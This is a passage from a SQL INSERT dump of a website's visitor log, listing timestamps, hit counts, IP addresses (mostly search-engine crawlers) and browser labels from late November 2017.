e'),(181408,1511630278,1,1,0,0,'51.255.64.106','other'),(181409,1511630832,1,1,0,0,'51.255.65.33','other'),(181410,1511631140,1,1,0,0,'216.244.66.237','other'),(181411,1511631371,1,1,0,0,'217.182.132.6','other'),(181412,1511632107,1,1,0,0,'180.76.15.144','other'),(181413,1511632517,1,1,0,0,'51.255.65.60','other'),(181414,1511633030,1,1,0,0,'188.163.71.221','chrome'),(181415,1511633278,1,1,0,0,'178.154.171.88','other'),(181416,1511633376,1,1,0,0,'8.29.198.26','other'),(181417,1511633719,1,1,0,0,'216.244.66.237','other'),(181418,1511633760,1,1,0,0,'217.182.132.190','other'),(181419,1511633961,1,1,0,0,'95.134.143.78','chrome'),(181420,1511634840,1,1,0,0,'178.150.119.54','firefox'),(181421,1511635010,2,2,0,0,'216.244.66.237','other'),(181422,1511635121,1,1,0,0,'66.249.64.29','chrome'),(181423,1511636004,2,2,0,0,'95.132.109.84','other'),(181424,1511636107,1,1,0,0,'180.76.15.149','other'),(181425,1511636399,1,1,0,0,'178.154.171.88','other'),(181426,1511636518,1,1,0,0,'141.8.132.19','other'),(181427,1511636754,1,1,0,0,'87.250.224.46','other'),(181428,1511636925,1,1,0,0,'51.255.71.133','other'),(181429,1511637027,1,1,0,0,'217.182.132.78','other'),(181430,1511637156,1,1,0,0,'213.180.203.37','other'),(181431,1511637299,1,1,0,0,'217.182.132.83','other'),(181432,1511637540,1,1,0,0,'217.182.132.53','other'),(181433,1511637561,1,1,0,0,'216.244.66.237','other'),(181434,1511637712,1,1,0,0,'164.132.162.154','other'),(181435,1511638767,1,1,0,0,'51.255.65.32','other'),(181436,1511638914,1,1,0,0,'216.244.66.237','other'),(181437,1511640050,1,1,0,0,'217.182.132.33','other'),(181438,1511640749,1,1,0,0,'178.154.171.86','other'),(181439,1511640780,1,1,0,0,'137.74.207.114','other'),(181440,1511640896,1,1,0,0,'51.255.71.115','other'),(181441,1511640933,1,1,0,0,'151.80.27.118','other'),(181442,1511640969,1,1,0,0,'217.182.132.58','other'),(181443,1511641357,1,1,0,0,'51.255.65.224','other'),(181444,1511641666,9,9,0,0,'5.9.88.103','other'),(181445,1511641681,1,1,0,0,'213.180.203.37','other'),(181446,1511641888,1,1,0,0,'40.77.167.41','other'),(181447,1511642133,1,1,0,0,'137.74.207.116','other'),(181448,1511642590,1,1,0,0,'178.154.171.86','other'),(181449,1511642753,1,1,0,0,'217.182.132.22','other'),(181450,1511642894,1,1,0,0,'40.77.167.41','other'),(181451,1511643043,1,1,0,0,'207.154.209.63','other'),(181452,1511643218,1,1,0,0,'51.255.71.113','other'),(181453,1511643409,4,4,0,0,'216.244.66.237','other'),(181454,1511643441,2,2,0,0,'213.180.203.37','other'),(181455,1511643474,1,1,0,0,'51.255.65.20','other'),(181456,1511643688,9,9,0,0,'82.158.254.121','chrome'),(181457,1511643690,2,2,0,0,'82.158.254.121','other'),(181458,1511643692,1,1,0,0,'82.158.254.121','firefox'),(181459,1511644214,1,1,0,0,'8.29.198.27','other'),(181460,1511644420,1,1,0,0,'178.154.171.86','other'),(181461,1511644834,1,1,0,0,'216.244.66.237','other'),(181462,1511644923,1,1,0,0,'51.255.65.92','other'),(181463,1511645646,1,1,0,0,'51.255.65.18','other'),(181464,1511645761,1,1,0,0,'51.255.65.29','other'),(181465,1511646030,3,3,0,0,'213.180.203.37','other'),(181466,1511646650,1,1,0,0,'178.154.171.86','other'),(181467,1511647075,1,1,0,0,'217.182.132.186','other'),(181468,1511647082,3,3,0,0,'213.180.203.37','other'),(181469,1511647274,1,1,0,0,'178.154.200.32','other'),(181470,1511647539,3,3,0,0,'216.244.66.237','other'),(181471,1511647790,1,1,0,0,'178.154.171.86','other'),(181472,1511648237,1,1,0,0,'217.182.132.73','other'),(181473,1511648939,3,3,0,0,'178.154.171.86','other'),(181474,1511649046,1,1,0,0,'51.255.65.21','other'),(181475,1511649147,1,1,0,0,'51.255.65.84','other'),(181476,1511649430,1,1,0,0,'51.255.71.116','other'),(181477,1511649666,3,3,0,0,'213.180.203.37','other'),(181478,1511649953,1,1,0,0,'91.196.178.161','chrome'),(181479,1511650006,1,1,0,0,'178.154.200.32','other'),(181480,1511650535,1,1,0,0,'216.244.66.237','other'),(181481,1511650748,1,1,0,0,'51.255.65.47','other'),(181482,1511650761,1,0,1,0,'66.249.64.28',''),(181483,1511650955,1,1,0,0,'178.154.171.86','other'),(181484,1511651353,1,1,0,0,'141.8.183.10','other'),(181485,1511651430,1,1,0,0,'137.74.207.116','other'),(181486,1511651507,1,1,0,0,'137.74.207.164','other'),(181487,1511651702,1,1,0,0,'217.182.132.59','other'),(181488,1511651902,1,1,0,0,'217.182.132.65','other'),(181489,1511651967,1,1,0,0,'162.210.196.130','other'),(181490,1511652133,1,1,0,0,'35.184.189.105','other'),(181491,1511652353,1,1,0,0,'51.255.65.19','other'),(181492,1511652455,1,1,0,0,'201.18.18.173','chrome'),(181493,1511652613,1,1,0,0,'51.255.71.112','other'),(181494,1511652913,1,1,0,0,'51.255.71.110','other'),(181495,1511653335,2,2,0,0,'51.255.65.61','other'),(181496,1511653490,1,1,0,0,'216.244.66.237','other'),(181497,1511653559,1,1,0,0,'51.255.65.96','other'),(181498,1511653580,1,1,0,0,'217.182.132.146','other'),(181499,1511654289,1,1,0,0,'164.132.162.154','other'),(181500,1511654605,1,1,0,0,'207.46.13.95','other'),(181501,1511654607,1,1,0,0,'164.132.162.155','other'),(181502,1511655045,1,1,0,0,'8.29.198.25','other'),(181503,1511655088,1,1,0,0,'51.255.71.98','other'),(181504,1511655696,1,1,0,0,'137.74.207.159','other'),(181505,1511656324,2,2,0,0,'216.244.66.237','other'),(181506,1511656466,1,1,0,0,'91.209.11.236','other'),(181507,1511656984,1,1,0,0,'217.182.132.19','other'),(181508,1511657116,1,1,0,0,'51.255.71.131','other'),(181509,1511657146,1,1,0,0,'51.255.65.51','other'),(181510,1511657345,1,1,0,0,'207.46.13.178','other'),(181511,1511657393,1,1,0,0,'35.184.189.105','other'),(181512,1511657646,1,1,0,0,'51.255.65.65','other'),(181513,1511657688,1,1,0,0,'216.244.66.237','other'),(181514,1511658295,1,1,0,0,'157.55.39.94','other'),(181515,1511658611,1,1,0,0,'51.255.65.40','other'),(181516,1511658797,1,1,0,0,'51.255.65.3','other'),(181517,1511658911,1,1,0,0,'217.182.132.171','other'),(181518,1511660290,1,1,0,0,'178.154.171.86','other'),(181519,1511660547,1,1,0,0,'51.255.65.17','other'),(181520,1511660608,1,1,0,0,'217.182.132.58','other'),(181521,1511661637,1,1,0,0,'217.182.132.241','other'),(181522,1511661779,1,1,0,0,'217.182.132.184','other'),(181523,1511661940,1,1,0,0,'137.74.207.109','other'),(181524,1511662105,1,1,0,0,'51.255.65.51','other'),(181525,1511662133,1,1,0,0,'66.249.64.30','chrome'),(181526,1511663398,2,2,0,0,'216.244.66.237','other'),(181527,1511663746,1,1,0,0,'217.182.132.62','other'),(181528,1511663834,1,1,0,0,'51.255.71.132','other'),(181529,1511663955,1,1,0,0,'217.182.132.83','other'),(181530,1511664053,1,1,0,0,'35.184.189.105','other'),(181531,1511664073,1,1,0,0,'51.255.65.45','other'),(181532,1511664383,1,1,0,0,'217.182.132.186','other'),(181533,1511664415,1,1,0,0,'91.209.11.236','other'),(181534,1511664431,1,1,0,0,'217.182.132.176','other'),(181535,1511664757,1,1,0,0,'217.182.132.30','other'),(181536,1511665003,1,1,0,0,'51.255.65.36','other'),(181537,1511665271,1,1,0,0,'51.255.65.68','other'),(181538,1511665733,1,1,0,0,'35.184.189.105','other'),(181539,1511665880,1,1,0,0,'8.29.198.26','other'),(181540,1511666199,1,1,0,0,'216.244.66.237','other'),(181541,1511666325,1,1,0,0,'217.182.132.65','other'),(181542,1511666413,1,1,0,0,'51.255.65.70','other'),(181543,1511666434,1,1,0,0,'51.255.65.29','other'),(181544,1511666641,1,1,0,0,'40.77.167.119','other'),(181545,1511666863,1,1,0,0,'66.249.64.29','chrome'),(181546,1511667382,1,1,0,0,'217.182.132.192','other'),(181547,1511667578,1,1,0,0,'51.255.65.93','other'),(181548,1511667631,1,0,1,0,'66.249.70.25',''),(181549,1511667946,1,1,0,0,'51.255.65.33','other'),(181550,1511668129,1,1,0,0,'217.182.132.240','other'),(181551,1511668550,1,1,0,0,'40.77.167.136','other'),(181552,1511668696,1,1,0,0,'54.165.59.7','other'),(181553,1511669002,4,4,0,0,'216.244.66.237','other'),(181554,1511669090,1,1,0,0,'35.184.189.105','other'),(181555,1511669481,1,1,0,0,'157.55.39.94','other'),(181556,1511669490,1,1,0,0,'217.182.132.80','other'),(181557,1511670076,1,1,0,0,'51.255.65.25','other'),(181558,1511670586,1,0,1,0,'66.249.64.30',''),(181559,1511670797,1,1,0,0,'217.182.132.56','other'),(181560,1511670972,1,1,0,0,'217.182.132.33','other'),(181561,1511671354,1,1,0,0,'51.255.65.93','other'),(181562,1511671425,1,1,0,0,'51.255.65.60','other'),(181563,1511671717,1,1,0,0,'90.154.93.58','msie'),(181564,1511671777,1,1,0,0,'51.255.65.45','other'),(181565,1511672077,1,1,0,0,'216.244.66.237','other'),(181566,1511672135,2,2,0,0,'207.46.13.178','other'),(181567,1511672223,1,1,0,0,'217.182.132.74','other'),(181568,1511672302,1,1,0,0,'217.182.132.154','other'),(181569,1511672659,1,1,0,0,'51.255.65.76','other'),(181570,1511672850,1,1,0,0,'51.255.71.122','other'),(181571,1511672970,1,1,0,0,'51.255.65.23','other'),(181572,1511673345,1,1,0,0,'54.219.178.100','chrome'),(181573,1511673422,2,2,0,0,'35.184.189.105','other'),(181574,1511673537,2,2,0,0,'216.244.66.237','other'),(181575,1511674452,1,1,0,0,'51.255.65.83','other'),(181576,1511675066,1,1,0,0,'217.182.132.177','other'),(181577,1511675146,1,1,0,0,'51.255.71.121','other'),(181578,1511675228,3,3,0,0,'198.204.243.138','other'),(181579,1511675464,1,1,0,0,'66.249.70.29','chrome'),(181580,1511675528,2,2,0,0,'35.184.189.105','other'),(181581,1511675715,1,1,0,0,'217.182.132.75','other'),(181582,1511675939,1,1,0,0,'51.255.71.132','other'),(181583,1511676019,2,2,0,0,'216.244.66.237','other'),(181584,1511676713,1,1,0,0,'8.29.198.27','other'),(181585,1511676986,1,1,0,0,'217.182.132.69','other'),(181586,1511677348,1,1,0,0,'216.244.66.237','other'),(181587,1511677688,1,1,0,0,'35.184.189.105','other'),(181588,1511678522,1,1,0,0,'51.255.71.112','other'),(181589,1511678568,1,1,0,0,'217.182.132.20','other'),(181590,1511678724,1,1,0,0,'51.255.65.30','other'),(181591,1511678993,1,1,0,0,'66.249.70.25','chrome'),(181592,1511679094,1,1,0,0,'51.255.65.69','other'),(181593,1511679519,1,1,0,0,'157.55.39.94','other'),(181594,1511679662,1,1,0,0,'51.255.65.28','other'),(181595,1511679770,1,1,0,0,'51.255.65.65','other'),(181596,1511679861,1,1,0,0,'216.244.66.237','other'),(181597,1511680504,3,3,0,0,'35.184.189.105','other'),(181598,1511680516,1,1,0,0,'51.255.65.79','other'),(181599,1511680528,1,1,0,0,'217.182.132.81','other'),(181600,1511681152,2,2,0,0,'216.244.66.237','other'),(181601,1511681511,1,1,0,0,'35.184.189.105','other'),(181602,1511682049,1,1,0,0,'51.255.71.133','other'),(181603,1511682362,2,2,0,0,'216.244.66.237','other'),(181604,1511682363,1,1,0,0,'217.182.132.175','other'),(181605,1511682639,1,1,0,0,'217.182.132.178','other'),(181606,1511683460,1,0,1,0,'66.249.70.27',''),(181607,1511683539,1,1,0,0,'51.255.65.37','other'),(181608,1511683653,2,2,0,0,'216.244.66.237','other'),(181609,1511683820,1,1,0,0,'51.255.65.50','other'),(181610,1511683928,1,1,0,0,'217.182.132.30','other'),(181611,1511684409,1,1,0,0,'217.182.132.27','other'),(181612,1511685697,1,1,0,0,'217.182.132.67','other'),(181613,1511685808,1,1,0,0,'217.182.132.85','other'),(181614,1511685891,1,1,0,0,'51.255.71.123','other'),(181615,1511685922,1,1,0,0,'51.255.65.45','other'),(181616,1511686146,5,5,0,0,'185.8.236.222','other'),(181617,1511686171,1,1,0,0,'216.244.66.237','other'),(181618,1511686355,1,1,0,0,'51.255.65.63','other'),(181619,1511686635,1,0,1,0,'66.249.64.30',''),(181620,1511686804,35,35,0,0,'192.99.203.35','other'),(181621,1511686981,1,1,0,0,'51.255.65.42','other'),(181622,1511687305,1,1,0,0,'77.138.185.183','chrome'),(181623,1511687385,1,1,0,0,'216.244.66.237','other'),(181624,1511687542,1,1,0,0,'8.29.198.27','other'),(181625,1511687669,1,1,0,0,'180.76.15.154','other'),(181626,1511688112,1,0,1,0,'66.249.70.25',''),(181627,1511688231,1,1,0,0,'137.74.203.194','other'),(181628,1511688252,1,1,0,0,'51.255.65.87','other'),(181629,1511688649,1,1,0,0,'176.103.214.91','chrome'),(181630,1511688681,1,0,1,0,'66.249.64.29',''),(181631,1511689183,1,1,0,0,'137.74.207.164','other'),(181632,1511689414,2,2,0,0,'51.255.65.44','other'),(181633,1511689675,1,1,0,0,'46.48.13.161','chrome'),(181634,1511689994,1,1,0,0,'35.184.189.105','other'),(181635,1511690105,1,1,0,0,'51.255.71.130','other'),(181636,1511690343,1,1,0,0,'40.77.167.124','other'),(181637,1511690536,1,1,0,0,'217.182.132.7','other'),(181638,1511690856,7,7,0,0,'46.229.168.73','other'),(181639,1511690876,8,8,0,0,'46.229.168.79','other'),(181640,1511690901,4,4,0,0,'46.229.168.80','other'),(181641,1511690982,5,5,0,0,'46.229.168.75','other'),(181642,1511691007,11,11,0,0,'46.229.168.78','other'),(181643,1511691067,6,6,0,0,'46.229.168.70','other'),(181644,1511691081,10,10,0,0,'46.229.168.66','other'),(181645,1511691136,5,5,0,0,'46.229.168.69','other'),(181646,1511691158,5,5,0,0,'46.229.168.68','other'),(181647,1511691195,6,6,0,0,'46.229.168.65','other'),(181648,1511691354,8,8,0,0,'46.229.168.71','other'),(181649,1511691418,14,14,0,0,'46.229.168.74','other'),(181650,1511691438,1,1,0,0,'217.182.132.51','other'),(181651,1511691718,1,1,0,0,'217.182.132.27','other'),(181652,1511691833,1,1,0,0,'37.55.57.49','chrome'),(181653,1511691898,3,3,0,0,'46.229.168.80','other'),(181654,1511691918,3,3,0,0,'46.229.168.73','other'),(181655,1511691980,13,13,0,0,'46.229.168.70','other'),(181656,1511692104,9,9,0,0,'46.229.168.66','other'),(181657,1511692114,4,4,0,0,'46.229.168.79','other'),(181658,1511692132,5,5,0,0,'46.229.168.68','other'),(181659,1511692156,8,8,0,0,'46.229.168.65','other'),(181660,1511692199,1,1,0,0,'157.55.39.94','other'),(181661,1511692268,8,8,0,0,'46.229.168.71','other'),(181662,1511692284,6,6,0,0,'46.229.168.78','other'),(181663,1511692360,2,2,0,0,'46.229.168.75','other'),(181664,1511692390,8,8,0,0,'46.229.168.69','other'),(181665,1511692408,2,2,0,0,'216.244.66.237','other'),(181666,1511692465,6,6,0,0,'46.229.168.74','other'),(181667,1511692716,1,1,0,0,'51.255.71.122','other'),(181668,1511692840,2,2,0,0,'46.229.168.73','other'),(181669,1511692913,1,1,0,0,'164.132.162.153','other'),(181670,1511693027,3,3,0,0,'46.229.168.80','other'),(181671,1511693161,1,1,0,0,'141.8.142.74','other'),(181672,1511693170,4,4,0,0,'46.229.168.70','other'),(181673,1511693178,4,4,0,0,'46.229.168.71','other'),(181674,1511693184,10,10,0,0,'46.229.168.68','other'),(181675,1511693225,4,4,0,0,'46.229.168.66','other'),(181676,1511693269,12,12,0,0,'46.229.168.78','other'),(181677,1511693316,4,4,0,0,'46.229.168.79','other'),(181678,1511693334,7,7,0,0,'46.229.168.69','other'),(181679,1511693424,7,7,0,0,'46.229.168.75','other'),(181680,1511693428,5,5,0,0,'46.229.168.65','other'),(181681,1511693448,8,8,0,0,'46.229.168.74','other'),(181682,1511693483,1,1,0,0,'51.255.65.85','other'),(181683,1511693643,1,1,0,0,'216.244.66.237','other'),(181684,1511693745,3,3,0,0,'46.229.168.73','other'),(181685,1511694110,1,1,0,0,'51.255.65.25','other'),(181686,1511694136,1,1,0,0,'35.184.189.105','other'),(181687,1511694190,9,9,0,0,'46.229.168.71','other'),(181688,1511694255,4,4,0,0,'46.229.168.66','other'),(181689,1511694317,4,4,0,0,'46.229.168.80','other'),(181690,1511694334,6,6,0,0,'46.229.168.68','other'),(181691,1511694357,5,5,0,0,'46.229.168.70','other'),(181692,1511694374,3,3,0,0,'46.229.168.79','other'),(181693,1511694432,6,6,0,0,'46.229.168.69','other'),(181694,1511694475,4,4,0,0,'46.229.168.65','other'),(181695,1511694490,4,4,0,0,'46.229.168.74','other'),(181696,1511694612,5,5,0,0,'46.229.168.75','other'),(181697,1511694714,15,15,0,0,'46.229.168.78','other'),(181698,1511694725,1,1,0,0,'217.182.132.30','other'),(181699,1511694885,1,1,0,0,'217.182.132.240','other'),(181700,1511694967,4,4,0,0,'46.229.168.73','other'),(181701,1511695277,5,5,0,0,'46.229.168.66','other'),(181702,1511695291,9,9,0,0,'46.229.168.70','other'),(181703,1511695300,1,1,0,0,'217.182.132.90','other'),(181704,1511695308,5,5,0,0,'46.229.168.79','other'),(181705,1511695342,3,3,0,0,'46.229.168.68','other'),(181706,1511695396,1,1,0,0,'51.255.65.4','other'),(181707,1511695456,3,3,0,0,'46.229.168.80','other'),(181708,1511695504,8,8,0,0,'46.229.168.74','other'),(181709,1511695571,1,1,0,0,'91.196.178.24','chrome'),(181710,1511695613,5,5,0,0,'46.229.168.69','other'),(181711,1511695635,1,1,0,0,'178.154.171.88','other'),(181712,1511695657,8,8,0,0,'46.229.168.75','other'),(181713,1511695702,1,1,0,0,'40.77.167.136','other'),(181714,1511695711,6,6,0,0,'46.229.168.65','other'),(181715,1511695727,6,6,0,0,'46.229.168.71','other'),(181716,1511695750,7,7,0,0,'46.229.168.78','other'),(181717,1511695876,1,1,0,0,'40.77.167.119','other'),(181718,1511695890,2,2,0,0,'35.184.189.105','other'),(181719,1511695994,10,10,0,0,'46.229.168.73','other'),(181720,1511696140,1,1,0,0,'216.244.66.237','other'),(181721,1511696249,7,7,0,0,'46.229.168.70','other'),(181722,1511696306,5,5,0,0,'46.229.168.68','other'),(181723,1511696392,3,3,0,0,'46.229.168.66','other'),(181724,1511696492,5,5,0,0,'46.229.168.74','other'),(181725,1511696518,4,4,0,0,'46.229.168.79','other'),(181726,1511696593,6,6,0,0,'46.229.168.69','other'),(181727,1511696643,3,3,0,0,'46.229.168.80','other'),(181728,1511696807,2,2,0,0,'46.229.168.75','other'),(181729,1511696849,5,5,0,0,'46.229.168.78','other'),(181730,1511696909,3,3,0,0,'46.229.168.73','other'),(181731,1511696936,2,2,0,0,'46.229.168.71','other'),(181732,1511697168,1,1,0,0,'51.255.65.78','other'),(181733,1511697199,1,1,0,0,'88.99.194.48','firefox'),(181734,1511697204,1,1,0,0,'94.130.168.232','firefox'),(181735,1511697320,1,1,0,0,'216.244.66.237','other'),(181736,1511697414,1,1,0,0,'51.255.65.23','other'),(181737,1511697544,1,1,0,0,'217.182.132.149','other'),(181738,1511697849,1,1,0,0,'217.182.132.85','other'),(181739,1511698378,1,1,0,0,'8.29.198.26','other'),(181740,1511698659,1,1,0,0,'216.244.66.237','other'),(181741,1511699325,1,1,0,0,'217.182.132.35','other'),(181742,1511699876,1,1,0,0,'216.244.66.237','other'),(181743,1511699928,1,1,0,0,'217.182.132.82','other'),(181744,1511699942,1,1,0,0,'51.255.65.40','other'),(181745,1511700563,1,1,0,0,'51.255.65.35','other'),(181746,1511701121,1,0,1,0,'68.180.229.52',''),(181747,1511701131,1,1,0,0,'35.184.189.105','other'),(181748,1511701286,1,1,0,0,'162.210.196.129','other'),(181749,1511702247,1,1,0,0,'51.255.65.46','other'),(181750,1511702361,2,2,0,0,'35.184.189.105','other'),(181751,1511702594,2,2,0,0,'216.244.66.237','other'),(181752,1511703318,1,1,0,0,'51.255.71.132','other'),(181753,1511703636,1,1,0,0,'141.8.142.74','other'),(181754,1511704217,1,1,0,0,'40.77.167.119','other'),(181755,1511704326,1,1,0,0,'217.182.132.16','other'),(181756,1511704595,1,1,0,0,'51.255.65.58','other'),(181757,1511704795,1,1,0,0,'51.255.71.119','other'),(181758,1511705429,1,1,0,0,'51.255.65.91','other'),(181759,1511705658,1,1,0,0,'109.254.251.9','other'),(181760,1511705902,1,1,0,0,'51.255.71.128','other'),(181761,1511705937,10,10,0,0,'46.4.32.75','other'),(181762,1511706092,1,1,0,0,'137.74.207.170','other'),(181763,1511706731,1,1,0,0,'217.182.132.97','other'),(181764,1511707022,1,0,1,0,'66.249.70.25',''),(181765,1511707335,1,1,0,0,'91.196.178.37','chrome'),(181766,1511707407,1,1,0,0,'164.132.162.153','other'),(181767,1511707560,1,1,0,0,'217.182.132.147','other'),(181768,1511707651,1,1,0,0,'51.255.65.41','other'),(181769,1511707660,1,1,0,0,'141.8.142.74','other'),(181770,1511708120,1,1,0,0,'216.244.66.237','other'),(181771,1511708244,1,1,0,0,'66.249.64.30','chrome'),(181772,1511708750,1,1,0,0,'217.182.132.29','other'),(181773,1511708814,1,1,0,0,'217.182.132.191','other'),(181774,1511709205,1,1,0,0,'8.29.198.26','other'),(181775,1511709616,1,1,0,0,'216.244.66.237','other'),(181776,1511709902,1,1,0,0,'51.255.65.21','other'),(181777,1511711057,3,3,0,0,'216.244.66.237','other'),(181778,1511711557,1,1,0,0,'51.255.71.132','other'),(181779,1511711686,1,1,0,0,'40.77.167.12','other'),(181780,1511712449,1,1,0,0,'216.244.66.237','other'),(181781,1511712471,1,0,1,0,'66.249.70.27',''),(181782,1511712722,1,1,0,0,'164.132.162.155','other'),(181783,1511713083,1,1,0,0,'217.182.132.240','other'),(181784,1511713646,2,2,0,0,'35.184.189.105','other'),(181785,1511713880,1,1,0,0,'216.244.66.237','other'),(181786,1511714314,1,1,0,0,'217.182.132.82','other'),(181787,1511714514,1,0,1,0,'66.249.70.29',''),(181788,1511714719,2,2,0,0,'141.8.142.74','other'),(181789,1511714975,1,1,0,0,'178.154.171.88','other'),(181790,1511715275,1,1,0,0,'91.196.178.69','chrome'),(181791,1511715390,1,1,0,0,'217.182.132.30','other'),(181792,1511715921,3,3,0,0,'141.8.142.74','other'),(181793,1511716327,1,1,0,0,'217.182.132.35','other'),(181794,1511716816,1,1,0,0,'51.255.71.112','other'),(181795,1511716957,1,1,0,0,'217.182.132.50','other'),(181796,1511716978,1,1,0,0,'216.244.66.237','other'),(181797,1511717015,1,1,0,0,'51.255.65.35','other'),(181798,1511717794,1,1,0,0,'157.55.39.94','other'),(181799,1511718131,2,2,0,0,'212.83.182.255','chrome'),(181800,1511718176,1,1,0,0,'87.250.224.66','other'),(181801,1511718180,1,1,0,0,'87.250.224.46','other'),(181802,1511718581,3,3,0,0,'46.229.168.72','other'),(181803,1511718586,3,3,0,0,'46.229.168.67','other'),(181804,1511718638,4,4,0,0,'46.229.168.77','other'),(181805,1511718653,6,6,0,0,'46.229.168.78','other'),(181806,1511718673,5,5,0,0,'46.229.168.80','other'),(181807,1511718701,2,2,0,0,'46.229.168.68','other'),(181808,1511718709,5,5,0,0,'46.229.168.76','other'),(181809,1511718746,5,5,0,0,'46.229.168.73','other'),(181810,1511718770,5,5,0,0,'46.229.168.70','other'),(181811,1511718784,8,8,0,0,'46.229.168.79','other'),(181812,1511718873,7,7,0,0,'46.229.168.65','other'),(181813,1511719047,6,6,0,0,'46.229.168.74','other'),(181814,1511719067,7,7,0,0,'46.229.168.69','other'),(181815,1511719119,1,1,0,0,'141.8.142.74','other'),(181816,1511719206,10,10,0,0,'46.229.168.66','other'),(181817,1511719563,6,6,0,0,'46.229.168.67','other'),(181818,1511719621,5,5,0,0,'46.229.168.72','other'),(181819,1511719670,8,8,0,0,'46.229.168.68','other'),(181820,1511719685,6,6,0,0,'46.229.168.70','other'),(181821,1511719708,8,8,0,0,'46.229.168.71','other'),(181822,1511719725,7,7,0,0,'46.229.168.73','other'),(181823,1511719765,10,10,0,0,'46.229.168.76','other'),(181824,1511719785,13,13,0,0,'46.229.168.79','other'),(181825,1511719857,6,6,0,0,'46.229.168.80','other'),(181826,1511719887,6,6,0,0,'46.229.168.78','other'),(181827,1511719894,9,9,0,0,'46.229.168.77','other'),(181828,1511719978,6,6,0,0,'46.229.168.69','other'),(181829,1511719990,13,13,0,0,'46.229.168.74','other'),(181830,1511720046,1,1,0,0,'8.29.198.26','other'),(181831,1511720220,2,2,0,0,'46.229.168.66','other'),(181832,1511720471,4,4,0,0,'46.229.168.65','other'),(181833,1511720551,11,11,0,0,'46.229.168.75','other'),(181834,1511720605,6,6,0,0,'46.229.168.72','other'),(181835,1511720633,17,17,0,0,'46.229.168.71','other'),(181836,1511720750,7,7,0,0,'46.229.168.79','other'),(181837,1511720765,12,12,0,0,'46.229.168.73','other'),(181838,1511720775,10,10,0,0,'46.229.168.80','other'),(181839,1511720824,13,13,0,0,'46.229.168.67','other'),(181840,1511720841,12,12,0,0,'46.229.168.78','other'),(181841,1511720883,12,12,0,0,'46.229.168.69','other'),(181842,1511720913,8,8,0,0,'46.229.168.70','other'),(181843,1511720976,15,15,0,0,'46.229.168.76','other'),(181844,1511720980,4,4,0,0,'46.229.168.77','other'),(181845,1511720994,5,5,0,0,'46.229.168.74','other'),(181846,1511721200,4,4,0,0,'216.244.66.237','other'),(181847,1511721441,15,15,0,0,'46.229.168.68','other'),(181848,1511721471,6,6,0,0,'46.229.168.66','other'),(181849,1511721536,9,9,0,0,'46.229.168.71','other'),(181850,1511721593,2,2,0,0,'46.229.168.75','other'),(181851,1511721608,8,8,0,0,'46.229.168.72','other'),(181852,1511721653,9,9,0,0,'46.229.168.79','other'),(181853,1511721784,9,9,0,0,'46.229.168.80','other'),(181854,1511721794,10,10,0,0,'46.229.168.65','other'),(181855,1511721833,16,16,0,0,'46.229.168.70','other'),(181856,1511721870,12,12,0,0,'46.229.168.67','other'),(181857,1511721899,22,22,0,0,'46.229.168.74','other'),(181858,1511721923,9,9,0,0,'46.229.168.73','other'),(181859,1511721970,15,15,0,0,'46.229.168.76','other'),(181860,1511722110,8,8,0,0,'46.229.168.78','other'),(181861,1511722159,11,11,0,0,'46.229.168.69','other'),(181862,1511722181,6,6,0,0,'46.229.168.77','other'),(181863,1511722416,16,16,0,0,'46.229.168.66','other'),(181864,1511722447,7,7,0,0,'46.229.168.68','other'),(181865,1511722585,5,5,0,0,'46.229.168.72','other'),(181866,1511722699,8,8,0,0,'46.229.168.79','other'),(181867,1511722711,7,7,0,0,'46.229.168.65','other'),(181868,1511722747,1,1,0,0,'217.182.132.96','other'),(181869,1511722770,8,8,0,0,'46.229.168.71','other'),(181870,1511722772,2,2,0,0,'216.244.66.237','other'),(181871,1511722828,10,10,0,0,'46.229.168.74','other'),(181872,1511722873,5,5,0,0,'46.229.168.76','other'),(181873,1511722915,10,10,0,0,'46.229.168.73','other'),(181874,1511722972,8,8,0,0,'46.229.168.80','other'),(181875,1511723073,1,1,0,0,'51.255.65.78','other'),(181876,1511723089,11,11,0,0,'46.229.168.77','other'),(181877,1511723103,1,1,0,0,'217.182.132.56','other'),(181878,1511723120,9,9,0,0,'46.229.168.69','other'),(181879,1511723136,8,8,0,0,'46.229.168.67','other'),(181880,1511723158,7,7,0,0,'46.229.168.70','other'),(181881,1511723215,1,1,0,0,'217.182.132.72','other'),(181882,1511723478,4,4,0,0,'46.229.168.78','other'),(181883,1511723542,6,6,0,0,'46.229.168.72','other'),(181884,1511723583,12,12,0,0,'46.229.168.68','other'),(181885,1511723613,8,8,0,0,'46.229.168.79','other'),(181886,1511723693,12,12,0,0,'46.229.168.65','other'),(181887,1511723825,7,7,0,0,'46.229.168.74','other'),(181888,1511723837,10,10,0,0,'46.229.168.73','other'),(181889,1511723844,9,9,0,0,'46.229.168.76','other'),(181890,1511723959,11,11,0,0,'46.229.168.80','other'),(181891,1511724044,6,6,0,0,'46.229.168.69','other'),(181892,1511724097,4,4,0,0,'46.229.168.66','other'),(181893,1511724162,7,7,0,0,'46.229.168.67','other'),(181894,1511724183,3,3,0,0,'216.244.66.237','other'),(181895,1511724226,4,4,0,0,'46.229.168.77','other'),(181896,1511724322,8,8,0,0,'46.229.168.70','other'),(181897,1511724451,8,8,0,0,'46.229.168.72','other'),(181898,1511724525,6,6,0,0,'46.229.168.78','other'),(181899,1511724556,11,11,0,0,'46.229.168.68','other'),(181900,1511724655,5,5,0,0,'46.229.168.65','other'),(181901,1511724674,7,7,0,0,'46.229.168.79','other'),(181902,1511724742,10,10,0,0,'46.229.168.73','other'),(181903,1511724767,9,9,0,0,'46.229.168.71','other'),(181904,1511724788,10,10,0,0,'46.229.168.74','other'),(181905,1511724892,8,8,0,0,'46.229.168.76','other'),(181906,1511724948,8,8,0,0,'46.229.168.69','other'),(181907,1511725012,1,1,0,0,'157.55.39.94','other'),(181908,1511725179,5,5,0,0,'46.229.168.67','other'),(181909,1511725265,1,1,0,0,'217.182.132.71','other'),(181910,1511725328,5,5,0,0,'46.229.168.70','other'),(181911,1511725354,4,4,0,0,'46.229.168.77','other'),(181912,1511725568,3,3,0,0,'46.229.168.72','other'),(181913,1511725586,6,6,0,0,'46.229.168.68','other'),(181914,1511725659,6,6,0,0,'46.229.168.78','other'),(181915,1511725676,2,2,0,0,'46.229.168.79','other'),(181916,1511725749,5,5,0,0,'46.229.168.80','other'),(181917,1511725769,4,4,0,0,'46.229.168.65','other'),(181918,1511725786,3,3,0,0,'46.229.168.66','other'),(181919,1511725803,1,1,0,0,'217.182.132.79','other'),(181920,1511725877,3,3,0,0,'46.229.168.73','other'),(181921,1511725896,7,7,0,0,'46.229.168.74','other'),(181922,1511725909,1,1,0,0,'180.76.15.161','other'),(181923,1511726018,3,3,0,0,'46.229.168.